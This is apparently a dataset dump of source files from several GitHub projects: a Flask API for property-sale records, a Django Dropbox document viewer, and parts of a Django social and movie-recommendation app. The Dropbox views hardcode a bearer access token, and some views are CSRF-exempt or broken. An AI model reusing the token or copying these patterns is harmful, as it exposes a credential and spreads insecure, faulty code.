"text": "from flask import Flask, request, send_from_directory, jsonify\nimport json\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\npd.set_option('display.max_rows', 1000)\npd.set_option('display.max_columns', 500)\npd.set_option('display.width', 1000)\npd.set_option('precision', 0)\n\napp = Flask(__name__, static_url_path='')\n\nconfig = pd.read_csv('config.csv', header=None)\nid = config[0][0]\npwd = config[0][1]\nhost = config[0][2]\ndb = config[0][3]\nengine = create_engine('mysql+pymysql://%s:%s@%s/%s?charset=utf8mb4'%(id, pwd, host, db))\n\[email protected]('/')\ndef root():\n\treturn app.send_static_file('index.html')\n\[email protected]('/css/<path:path>')\ndef send_css(path):\n\treturn send_from_directory('static/css', path)\n\n\[email protected]('/js/<path:path>')\ndef send_js(path):\n\treturn send_from_directory('static/js', path)\n\[email protected]('/donneesgeo/<path:path>')\ndef send_donneesgeo(path):\n\treturn send_from_directory('static/donneesgeo', path)\n\[email protected]('/api/dates2')\ndef dates():\n\tdateMin = pd.read_sql(\"\"\"SELECT min(date_mutation) as min FROM dvf \"\"\", engine)\n\tdateMax = pd.read_sql(\"\"\"SELECT max(date_mutation) as max FROM dvf \"\"\", engine)\n\treturn '{\"min\": \"' + str(dateMin['min'][0]) + '\", \"max\": \"' + str(dateMax['max'][0]) + '\"}' \n\[email protected]('/api/mutations3/<commune>/<sectionPrefixee>')\ndef get_mutations3(commune, sectionPrefixee):\n\tmutations = pd.read_sql(\"\"\"SELECT * FROM dvf WHERE code_commune = %(code)s AND section_prefixe = %(sectionPrefixee)s\"\"\", engine, params = {\"code\": commune, \"sectionPrefixee\" : sectionPrefixee})\n\tmutations = mutations.applymap(str) # Str pour éviter la conversion des dates en millisecondes.\n\tmutations = mutations.sort_values(by=['date_mutation', 'code_type_local'], ascending=[False, True])\n\tjson_mutations = '{\"mutations\": ' + mutations.to_json(orient = 'records') + '}'\n\treturn json_mutations"
}
] | 3 |
Sunil-Sonu/docviewer-backend | https://github.com/Sunil-Sonu/docviewer-backend | 900eb727602484dd7d7e56f8a7f4741b825fcd01 | 479389e7eae925e88c7d40d292e6b5a61c423afb | ff8c390062fd8f8c5066de0b8f7bb3ae5f935169 | refs/heads/master | 2020-06-05T02:06:08.750850 | 2019-06-17T04:26:13 | 2019-06-17T04:26:13 | 192,274,782 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7248677015304565,
"alphanum_fraction": 0.7354497313499451,
"avg_line_length": 30.5,
"blob_id": "28b9e2d93f6abe3a8735ca4a5187e8cec6aa8e77",
"content_id": "140a77b0bf546875c5bc4c456f317524c6c81d6f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 378,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 12,
"path": "/docviewer/models.py",
"repo_name": "Sunil-Sonu/docviewer-backend",
"src_encoding": "UTF-8",
"text": "from __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\n\nclass UserFolder(models.Model):\n creator = models.ForeignKey(User, on_delete=models.CASCADE)\n folderId = models.CharField(primary_key=True, max_length=50)\n folderPath = models.CharField(max_length=50)\n\n def __str__(self):\n return self.folderId\n"
},
{
"alpha_fraction": 0.8223350048065186,
"alphanum_fraction": 0.8223350048065186,
"avg_line_length": 27.14285659790039,
"blob_id": "3f4e9049dde8c0e71a15c2fb1890ac42f43af037",
"content_id": "b7ee52bbeb6a3663f68e73ea963286f48ad6f54c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 197,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 7,
"path": "/docviewer/admin.py",
"repo_name": "Sunil-Sonu/docviewer-backend",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n\n# Register your models here.\nfrom django.contrib import admin\nfrom docviewer.models import UserFolder\n# Register your models here.\nadmin.site.register(UserFolder)\n"
},
{
"alpha_fraction": 0.6576025485992432,
"alphanum_fraction": 0.6650804281234741,
"avg_line_length": 48.59550476074219,
"blob_id": "29c84485ca80f5fa5fad443993e0b88d2136e558",
"content_id": "8501d6ea1415d257d55ce85fb80e4def7ea0a688",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4413,
"license_type": "no_license",
"max_line_length": 195,
"num_lines": 89,
"path": "/docviewer/views.py",
"repo_name": "Sunil-Sonu/docviewer-backend",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.core.files.storage import default_storage\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.models import User\nfrom docviewer.models import *\n\nimport requests\nimport json\nimport uuid\n\n@csrf_exempt\ndef getFiles(request):\n if not request.user.is_authenticated:\n return JsonResponse({'status': 'Please login'}, status=401)\n filePath = request.GET['path'] if 'path' in request.GET else \"\"\n response = requests.post('https://api.dropboxapi.com/2/files/list_folder', headers= {'Authorization': 'Bearer w3mybzDx2AAAAAAAAAAAp-dAkpeDk9G1Mnh_Ze3-latb8lXZwNpudRkuRaTztegp', 'Content-Type': 'application/json'}, data=json.dumps({\n \"path\": UserFolder.objects.get(creator=request.user).folderPath + filePath,\n \"recursive\": False,\n \"include_media_info\": False,\n \"include_deleted\": False,\n \"include_has_explicit_shared_members\": False,\n \"include_mounted_folders\": True,\n \"include_non_downloadable_files\": True\n}))\n return JsonResponse(response.json(), content_type = 'application/json')\n\n@csrf_exempt\ndef getDownloadLink(request):\n if not request.user.is_authenticated:\n return JsonResponse({'status': 'Please login'}, status=401)\n filePath = request.GET['path']\n response = requests.post('https://api.dropboxapi.com/2/files/get_temporary_link', headers= {'Authorization': 'Bearer w3mybzDx2AAAAAAAAAAAp-dAkpeDk9G1Mnh_Ze3-latb8lXZwNpudRkuRaTztegp', 'Content-Type': 'application/json'}, data=json.dumps({\n \"path\": UserFolder.objects.get(creator=request.user).folderPath + filePath\n }))\n return JsonResponse(response.json(), content_type = 'application/json')\n\n@csrf_exempt\ndef uploadFile(request):\n if not request.user.is_authenticated:\n return JsonResponse({'status': 'Please login'}, status=401)\n file = request.FILES.getlist('fileData')\n filePath = path = request.POST['path'] if 'path' in request.GET else \"\"\n fs = FileSystemStorage(location='/media')\n file_name = fs.save(file.name, file)\n # TODO: Implement reading the file and uploading it.\n response = requests.post('https://content.dropboxapi.com/2/files/upload', headers= {'Authorization': 'Bearer w3mybzDx2AAAAAAAAAAAp-dAkpeDk9G1Mnh_Ze3-latb8lXZwNpudRkuRaTztegp', \n 'Dropbox-API-Arg': '{\\\"path\\\": ' + UserFolder.objects.get(creator=request.user).folderPath + filePath + ',\\\"mode\\\": \\\"add\\\",\\\"autorename\\\": true,\\\"mute\\\": false,\\\"strict_conflict\\\": false}\"',\n 'Content-Type': 'application/octet-stream'}, \n data=file)\n return JsonResponse({'success': file_name}, content_type = 'application/json')\n\n@csrf_exempt\ndef user_login(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password')\n user = authenticate(username=username, password=password)\n if user:\n if user.is_active:\n login(request, user)\n return JsonResponse({'data': 'Success'}, content_type = 'application/json')\n else:\n return JsonResponse({'error_message': 'Your account is disabled.'}, status= 401)\n else:\n return JsonResponse({'error_message': 'Invalid Login Details'}, status= 401)\n return JsonResponse({'error_message': 'Invalid Login Request'}, status= 500)\n\n@csrf_exempt\ndef user_register(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n email = request.POST.get('email')\n password = request.POST.get('password')\n if username is None or email is None or 
password is None:\n return JsonResponse({'error_message': 'Please enter proper details'}, status=400)\n user = User.objects.create_user(username = username, email = email, password = password)\n if user:\n response = requests.post('https://api.dropboxapi.com/2/files/create_folder_v2', headers= {'Authorization': 'Bearer w3mybzDx2AAAAAAAAAAAp-dAkpeDk9G1Mnh_Ze3-latb8lXZwNpudRkuRaTztegp', 'Content-Type': 'application/json'}, data=json.dumps({\n \"path\": \"/\" + uuid.uuid4().hex,\n \"autorename\": False\n }))\n if response.status_code == 200:\n UserFolder.objects.create(folderId=response.json()['metadata']['id'], creator=user, folderPath=response.json()['metadata']['path_display'])\n return JsonResponse({'message': 'Success'})\n else:\n user.delete()\n return JsonResponse({'error_message': 'Not a valid request'}, status=500)"
},
{
"alpha_fraction": 0.6646825671195984,
"alphanum_fraction": 0.6646825671195984,
"avg_line_length": 41.08333206176758,
"blob_id": "debcfa89b41b02beb15061610a2714e177534b06",
"content_id": "f61f0e861efc0ace00c0320015cd6ccfb0f15412",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 504,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 12,
"path": "/docviewer/routes/api.py",
"repo_name": "Sunil-Sonu/docviewer-backend",
"src_encoding": "UTF-8",
"text": "from django.urls import re_path\nfrom django.views.decorators.csrf import csrf_exempt\nfrom docviewer import views\n\ndef getRoutes():\n return [\n re_path(r'getFiles$', views.getFiles, name = 'getFiles'),\n re_path(r'getDownloadLink$', views.getDownloadLink, name = 'getDownloadLink'),\n re_path(r'uploadFile$', views.uploadFile, name = 'uploadFile'),\n re_path(r'login$', views.user_login, name = 'login'),\n re_path(r'signup$', views.user_register, name = 'signup'),\n ];"
},
{
"alpha_fraction": 0.5566801428794861,
"alphanum_fraction": 0.623481810092926,
"avg_line_length": 23.700000762939453,
"blob_id": "d78fb6139863535ee84318e1b39ee9885b4f35c9",
"content_id": "2a95bc2605e98b91ba2639ffe6ba3fdbd868c320",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 494,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 20,
"path": "/docviewer/migrations/0003_userfolder_folderpath.py",
"repo_name": "Sunil-Sonu/docviewer-backend",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.2.2 on 2019-06-17 03:16\n\nfrom django.db import migrations, models\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('docviewer', '0002_auto_20190617_0308'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='userfolder',\n name='folderPath',\n field=models.CharField(default=django.utils.timezone.now, max_length=50),\n preserve_default=False,\n ),\n ]\n"
}
] | 5 |
kamikazechaser/satrajit2_574b | https://github.com/kamikazechaser/satrajit2_574b | d2a42040cf5529b448bd5699d3399312646e76cd | 87558dd3e0f542065b51383746cb55d2109b386f | b4efbdd7cbe1834e9dc930f3874acaf8f7b1ba1e | refs/heads/master | 2020-08-11T09:33:18.223474 | 2019-10-12T08:42:13 | 2019-10-12T08:42:13 | 214,368,232 | 0 | 0 | null | 2019-10-11T07:10:28 | 2019-10-11T06:58:01 | 2019-10-11T06:58:00 | null | [
{
"alpha_fraction": 0.5863108038902283,
"alphanum_fraction": 0.5962117910385132,
"avg_line_length": 32.66666793823242,
"blob_id": "560b007a1daf076ce8048403530ce651e30a4d74",
"content_id": "acb0e7bb6a917e8e90e8932ce01a5ee5069f00df",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2323,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 69,
"path": "/backend/moodx/api/ml/recommender/inference.py",
"repo_name": "kamikazechaser/satrajit2_574b",
"src_encoding": "UTF-8",
"text": "import argparse\nimport random\nfrom CFModel import CFModel\nfrom recommender import *\n\n# Use the pre-trained model\ntrained_model = CFModel(max_userid, max_movieid, K_FACTORS)\n\n# Load weights\ntrained_model.load_weights('weights.h5')\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--user_id', type=int)\nparser.add_argument('--emo', type=int)\nargs = vars(parser.parse_args())\n\n# Pick a random test user\n# A random test user (user_id = 2000) # TODO: Test user for debugging\nTEST_USER = 2000\nemo = args[\"emo\"]\n\n# users[users['user_id'] == args[\"user_id\"]] # user specified\nusers[users['user_id'] == random.randint(1, 2000)] # random\n\n\n# Function to predict the ratings given User ID and Movie ID\ndef predict_rating(user_id, movie_id):\n return trained_model.rate(user_id - 1, movie_id - 1)\n\n\nuser_ratings = ratings[ratings['user_id'] == TEST_USER][['user_id',\n 'movie_id',\n 'rating']]\n\nuser_ratings['prediction'] = user_ratings\\\n .apply(lambda x: predict_rating(TEST_USER, x['movie_id']), axis=1)\n\nrecommendations = ratings[ratings['movie_id'].isin(user_ratings['movie_id']) == False][['movie_id']]\\\n .drop_duplicates()\n\nrecommendations['prediction'] = recommendations\\\n .apply(lambda x: predict_rating(TEST_USER, x['movie_id']), axis=1)\n\n# negative is 0 and positive is 1\nemo_map = {1: [\"Comedy\", \"Drama\", \"Fantasy\", \"Action\", \"Adventure\", \"Animation\", \"Children's\", \"Crime\", \"Documentary\",\n \"Horror\", \"Mystery\", \"Sci-Fi\"], 0: [\"Comedy\", \"Fantasy\", \"Thriller\", \"War\", \"Western\", \"Action\",\n \"Adventure\", \"Film-Noir\", \"Musical\", \"Romance\"]}\nsorted_recs = recommendations.\\\n sort_values(by='prediction', ascending=False).\\\n merge(movies,\n on='movie_id',\n how='inner',\n suffixes=['_u', '_m']).\\\n head(5)\n\n# print(type(sorted_recs))\n# print(sorted_recs)\n\nrecommended = set()\nfor genre in sorted_recs[\"genres\"]:\n gen = genre.split(\"|\")\n for g in gen:\n if g in emo_map[emo]:\n movie = sorted_recs[sorted_recs[\"genres\"] == genre][\"title\"]\n # print(list(movie))\n for x in list(movie):\n recommended.add(x[: x.index(\" (\")])\n\nprint(recommended)\n"
},
{
"alpha_fraction": 0.6864607930183411,
"alphanum_fraction": 0.6959620118141174,
"avg_line_length": 30.185184478759766,
"blob_id": "7644adca29dc1f288c4c8e36928713811bb78fd6",
"content_id": "497c6cf9cea20929399ede6f9ab9f451b1757563",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 842,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 27,
"path": "/backend/moodx/api/views.py",
"repo_name": "kamikazechaser/satrajit2_574b",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.views.generic import View\nfrom django.utils.decorators import method_decorator\nfrom django.core.files.storage import FileSystemStorage\nfrom django.conf import settings\n\nfrom api.decorators.response import JsonResponseDecorator\nimport base64\nimport os\nimport time\n\n\n@method_decorator(JsonResponseDecorator, name='dispatch')\nclass SuggestView(View):\n def post(self, request):\n print(request.POST)\n image = request.POST.get('image')\n image = str(image)[22:]\n image = base64.b64decode(image)\n curr_time = time.time()\n save_path = os.path.join(settings.MEDIA_ROOT, f'image_{curr_time}.png')\n\n with open(save_path, 'wb+') as f:\n f.write(image)\n\n print(f'Received: {save_path}')\n return {'message': f'Uploaded {save_path}'}\n"
}
] | 2 |
jamlkht/Drobots | https://github.com/jamlkht/Drobots | ec979a6af8371c5b3acaa3aacab73b5561ee392b | 38f7626001147c51042efff84e9ee18ed40411e3 | 4810e29b4312d295e885ca8dfe43181ad3634579 | refs/heads/master | 2021-01-10T10:35:10.105583 | 2015-12-07T11:20:39 | 2015-12-07T11:20:39 | 47,546,477 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.541124165058136,
"alphanum_fraction": 0.5535090565681458,
"avg_line_length": 23.6015625,
"blob_id": "bebfedb0396934960dc95bf27ceb9e9946d5ae6c",
"content_id": "a29d49246a9fa71d224b99917241c02582699b61",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3150,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 128,
"path": "/Player.py",
"repo_name": "jamlkht/Drobots",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python -u\n# -*- coding: utf-8 -*-\n\nimport sys\nimport Ice\nimport time\nfrom math import atan2, degrees, sqrt\nfrom random import randint\n\nIce.loadSlice('Drobots.ice')\nimport drobots\n\n\nclass Client(Ice.Application):\n def run(self, argv):\n broker = self.communicator()\n adapter = broker.createObjectAdapter(\"PlayerAdapter\")\n adapter.activate()\n servant = PlayerI(broker, adapter)\n\n player_prx = adapter.add(servant, broker.stringToIdentity(\"player1\"))\n print(str(player_prx))\n player = drobots.PlayerPrx.uncheckedCast(player_prx)\n\n game_prx = broker.stringToProxy(argv[1])\n print(str(game_prx))\n game = drobots.GamePrx.uncheckedCast(game_prx)\n\n nick = \"josen\" + str(randint(100, 999))\n\n if not game:\n raise RuntimeError('Invalid proxy')\n while 1:\n try:\n game.login(player, nick)\n break\n except drobots.GameInProgress:\n print(\"\\n Lo están usando tron, espera un poco\")\n time.sleep(2)\n except drobots.InvalidProxy:\n print(\"Proxy invalido\")\n except drobots.InvalidName:\n print(\"No vale ese nombre jefe\")\n\n self.shutdownOnInterrupt()\n broker.waitForShutdown()\n return 1\n\n\nclass PlayerI(drobots.Player):\n def __init__(self, broker, adapter):\n self.broker = broker\n self.adapter = adapter\n\n def makeController(self, robot, current=None):\n print(\"make Controller\")\n rb_servant = RobotController(robot)\n rb_proxy = self.adapter.add(rb_servant, self.broker.stringToIdentity(\"robotcontroller\"))\n robot_controller = drobots.RobotControllerPrx.uncheckedCast(rb_proxy)\n\n return robot_controller\n\n def win(self, current=None):\n print(\"DiooooH, Hemoh Ganao\")\n\n def lose(self, current=None):\n print(\"Foh, otra derrota\")\n\n\nclass RobotController(drobots.RobotController):\n\n def __init__(self, robot):\n self.robot = robot\n\n def turn(self, current=None):\n\n SCAN = 1\n MOVE = 2\n ATTACK = 3\n action = None\n sAngle = 0\n\n if action.equals(None):\n\n action = MOVE\n\n\n if action == MOVE:\n\n position = self.robot.location()\n print(position.y, position.x)\n deltax = 500 - position.x\n deltay = 500 - position.y\n hip = sqrt(deltax**2 + deltay**2)\n\n angle = int(degrees(atan2(deltay, deltax)))\n if hip >= 100:\n speed = 100\n else:\n speed = 0\n action = SCAN\n\n self.robot.drive(angle, speed)\n\n if action == SCAN:\n wide = 18\n\n while 1:\n print(self.robot.scan(sAngle, wide))\n\n if (self.robot.scan(sAngle, wide)) == 1:\n\n action = ATTACK\n break\n else:\n sAngle += wide\n\n if action == ATTACK:\n self.robot.cannon(sAngle, 90)\n\n\n\n\n\n\n\nclient = Client()\nsys.exit(client.main(sys.argv))\n"
}
] | 1 |
maksymkv25/starnavi | https://github.com/maksymkv25/starnavi | 3f27161e28a0883dae06bcd94260767d0f68cf4c | f78a411924b81e96831a2aab605810cd831e8035 | d5df18d77e1c7d15046fa7014a083d5927a3ee2a | refs/heads/master | 2020-03-27T15:27:03.280267 | 2018-09-07T08:36:37 | 2018-09-07T08:36:37 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6551321744918823,
"alphanum_fraction": 0.6683514714241028,
"avg_line_length": 33.75675582885742,
"blob_id": "ee7ff58efba332770a93ee19f273230104f42481",
"content_id": "952ae14618982c10be03e99527cbc5fbff7724d1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2572,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 74,
"path": "/app/post/views.py",
"repo_name": "maksymkv25/starnavi",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.utils.decorators import method_decorator\nfrom rest_framework import permissions\nfrom rest_framework.generics import CreateAPIView, RetrieveAPIView\nfrom rest_framework.response import Response\nfrom rest_framework.status import(\n HTTP_200_OK,\n HTTP_400_BAD_REQUEST,\n HTTP_404_NOT_FOUND\n)\nfrom rest_framework.views import APIView\nfrom .serializers import (\n PostCreationSerializer,\n PostLikeSerializer\n)\nfrom .models import Post\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass PostCreationAPIView(CreateAPIView):\n permission_classes = [permissions.IsAuthenticated]\n serializer_class = PostCreationSerializer\n\n def post(self, request, *args, **kwargs):\n data = request.data\n serializer = PostCreationSerializer(data=data,\n context={'request': request})\n if serializer.is_valid(raise_exception=True):\n new_data = serializer.data\n return Response(new_data, status=HTTP_200_OK)\n return Response(serializer.errors, status=HTTP_400_BAD_REQUEST)\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass PostLikeAPIView(RetrieveAPIView):\n permission_classes = [permissions.IsAuthenticated]\n serializer_class = PostLikeSerializer\n\n def get_object(self, id):\n try:\n return Post.objects.get(id=id)\n except Post.DoesNotExist:\n return None\n\n def get(self, request, id):\n post = self.get_object(int(id))\n if not post:\n return Response({'error': 'There is no such post.'}, status=HTTP_404_NOT_FOUND)\n post.like += 1\n post.save()\n return Response({'success': True, 'likes': post.like}, status=HTTP_200_OK)\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass PostUnlikeAPIView(RetrieveAPIView):\n permission_classes = [permissions.IsAuthenticated]\n serializer_class = PostLikeSerializer\n\n def get_object(self, id):\n try:\n return Post.objects.get(id=id)\n except Post.DoesNotExist:\n return None\n\n def get(self, request, id):\n post = self.get_object(int(id))\n if not post:\n return Response({'error': 'There is no such post.'}, status=HTTP_404_NOT_FOUND)\n if post.like == 0 or post.like <= 0:\n return Response({'error': 'You can not reduce the value.'}, status=HTTP_200_OK)\n post.like -= 1\n post.save()\n return Response({'likes': post.like}, status=HTTP_200_OK)\n"
},
{
"alpha_fraction": 0.717391312122345,
"alphanum_fraction": 0.717391312122345,
"avg_line_length": 25.83333396911621,
"blob_id": "b5525f5a218fa0c47ba38a0f6be5e0fdefbcb877",
"content_id": "1900aaae9140f890d8b125a7cf76a17efc09b318",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 322,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 12,
"path": "/app/accounts/urls.py",
"repo_name": "maksymkv25/starnavi",
"src_encoding": "UTF-8",
"text": "from django.views.decorators.csrf import csrf_exempt\nfrom django.urls import path\nfrom .views import (\n UserLoginAPIView,\n UserSignupAPIView,\n)\n\n\nurlpatterns = [\n path('signup/', csrf_exempt(UserSignupAPIView.as_view()), name='Signup'),\n path('login/', csrf_exempt(UserLoginAPIView.as_view()), name='Login')\n]\n"
},
{
"alpha_fraction": 0.6460674405097961,
"alphanum_fraction": 0.6573033928871155,
"avg_line_length": 26.384614944458008,
"blob_id": "91c290dd148dcd014dbb62c1b1cd6dada63e0d66",
"content_id": "f99bea588d271d20f3994810b9a19018f1faa459",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 356,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 13,
"path": "/app/post/urls.py",
"repo_name": "maksymkv25/starnavi",
"src_encoding": "UTF-8",
"text": "from django.urls import re_path, path\nfrom .views import (\n PostCreationAPIView,\n PostLikeAPIView,\n PostUnlikeAPIView\n)\n\n\nurlpatterns = [\n path('create/', PostCreationAPIView.as_view(), name='Post create'),\n re_path(r'^(?P<id>[0-9]+)/like$', PostLikeAPIView.as_view()),\n re_path(r'^(?P<id>[0-9]+)/unlike$', PostUnlikeAPIView.as_view())\n]\n"
},
{
"alpha_fraction": 0.7445054650306702,
"alphanum_fraction": 0.7582417726516724,
"avg_line_length": 35.400001525878906,
"blob_id": "69ca25b34715d49eb23610ab59d5b9663a520b32",
"content_id": "277a6439bfcfe34e9ade2efef09d6baad5c58319",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 364,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 10,
"path": "/app/post/models.py",
"repo_name": "maksymkv25/starnavi",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.conf import settings\n\n\nclass Post(models.Model):\n owner = models.ForeignKey(User, on_delete=models.CASCADE)\n created = models.DateTimeField(auto_now_add=True)\n like = models.BigIntegerField(default=0)\n text = models.TextField(max_length=1000, blank=True, default='')\n"
},
{
"alpha_fraction": 0.6000000238418579,
"alphanum_fraction": 0.7142857313156128,
"avg_line_length": 22.33333396911621,
"blob_id": "865c38f447cb5700c484172e5119996b7a735c4d",
"content_id": "44d08396938da23c12e3c3cb2b18dddd06296e9b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 70,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 3,
"path": "/bot/config.py",
"repo_name": "maksymkv25/starnavi",
"src_encoding": "UTF-8",
"text": "number_of_users = 10\nmax_posts_per_user = 100\nmax_like_per_user = 500\n"
},
{
"alpha_fraction": 0.7863247990608215,
"alphanum_fraction": 0.7863247990608215,
"avg_line_length": 22.399999618530273,
"blob_id": "de7ac967cb898caa9e331aac5d748eb085c97a15",
"content_id": "a1eb75b39c49c99b6ab6084216ebf69b58ce12d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 117,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 5,
"path": "/README.md",
"repo_name": "maksymkv25/starnavi",
"src_encoding": "UTF-8",
"text": "# starnavi\nTechnical task\n\n\nSettings file saved in git for example. Add API keys of clearbit and hunter in settings.\n"
},
{
"alpha_fraction": 0.6863882541656494,
"alphanum_fraction": 0.6945089101791382,
"avg_line_length": 30.536584854125977,
"blob_id": "a9a06849a44189c485e9a17338e4555a8ca33173",
"content_id": "76efa895f36557f9c2da1f64cb70c31f15a3c651",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2586,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 82,
"path": "/app/accounts/views.py",
"repo_name": "maksymkv25/starnavi",
"src_encoding": "UTF-8",
"text": "import clearbit\nimport requests\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.utils.decorators import method_decorator\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.generics import CreateAPIView\nfrom rest_framework.response import Response\nfrom rest_framework.status import (\n HTTP_400_BAD_REQUEST,\n HTTP_404_NOT_FOUND,\n HTTP_200_OK,\n HTTP_201_CREATED\n)\nfrom rest_framework.views import APIView\nfrom rest_framework.permissions import AllowAny\nfrom .serializers import (\n UserSignupSerializer,\n UserLoginSerializer\n)\nfrom starnavi.settings import clearbit_key, hunter_key, hunter_api\n\n\nclearbit.key = clearbit_key\n\n\ndef get_additional_data_about_user(email):\n \"\"\"\n Additional data for the user on signup using Clearbit service.\n \"\"\"\n\n person = clearbit.Person.find(email=email, stream=True)\n if person != None:\n return person\n else:\n return False\n\n\ndef verify_existence_email(email):\n \"\"\"\n Verifying email existence on signup.\n \"\"\"\n\n data = 'email-verifier?email=%s&api_key=%s' % (email, hunter_key)\n url = hunter_api + data\n resp = requests.get(url=url)\n response = resp.json()\n if 'data' in response or 'meta' in response:\n # Successful response\n # If need additional information about email verifying see response\n return True\n else:\n # Error response\n return False\n\n\nclass UserSignupAPIView(CreateAPIView):\n permission_classes = [AllowAny]\n serializer_class = UserSignupSerializer\n queryset = User.objects.all()\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass UserLoginAPIView(APIView):\n permission_classes = [AllowAny]\n serializer_class = UserLoginSerializer\n\n def post(self, request, *args, **kwargs):\n data = request.data\n username = data.get('username')\n password = data.get('password')\n serializer = UserLoginSerializer(data=data)\n if serializer.is_valid(raise_exception=True):\n user = authenticate(username=username, password=password)\n if not user:\n return Response({'error': 'Invalid Credentials'},\n status=HTTP_404_NOT_FOUND)\n token, _ = Token.objects.get_or_create(user=user)\n return Response({'token': token.key}, status=HTTP_200_OK)\n return Response(serializer.errors, status=HTTP_400_BAD_REQUEST)\n"
},
{
"alpha_fraction": 0.6093906164169312,
"alphanum_fraction": 0.6093906164169312,
"avg_line_length": 21.244443893432617,
"blob_id": "d17bd377c947d3fbbadf8488da856c3f1c3540cf",
"content_id": "75841b5538a3047cad9f6c6577962d6863fea4ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1001,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 45,
"path": "/app/post/serializers.py",
"repo_name": "maksymkv25/starnavi",
"src_encoding": "UTF-8",
"text": "from django.contrib.auth.models import User\nfrom post.models import Post\nfrom rest_framework.serializers import (\n CharField,\n Field,\n ModelSerializer,\n SerializerMethodField,\n ValidationError,\n IntegerField\n)\n\n\nclass PostCreationSerializer(ModelSerializer):\n text = CharField(required=True, allow_blank=True)\n\n class Meta:\n model = Post\n fields = (\n 'id',\n 'text',\n )\n\n def validate(self, data):\n user = self.context['request'].user\n text = data.get('text', None)\n if not text:\n raise ValidationError('Text field is required.')\n post = Post.objects.create(owner=user, text=text)\n data.update({'id': post.id})\n return data\n\n\nclass PostLikeSerializer(ModelSerializer):\n like = IntegerField()\n\n class Meta:\n model = Post\n fields = {\n 'like'\n }\n def validate(self, data):\n pass\n\nclass PostUnlikeSerializer(ModelSerializer):\n pass\n"
},
{
"alpha_fraction": 0.5638183951377869,
"alphanum_fraction": 0.5652484893798828,
"avg_line_length": 27.835052490234375,
"blob_id": "f63520b552f0ad2cc3c3892ddd7e0d18cd728e8e",
"content_id": "f888c611e13e7fb593ecbbb895f458a56136282a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2797,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 97,
"path": "/app/accounts/serializers.py",
"repo_name": "maksymkv25/starnavi",
"src_encoding": "UTF-8",
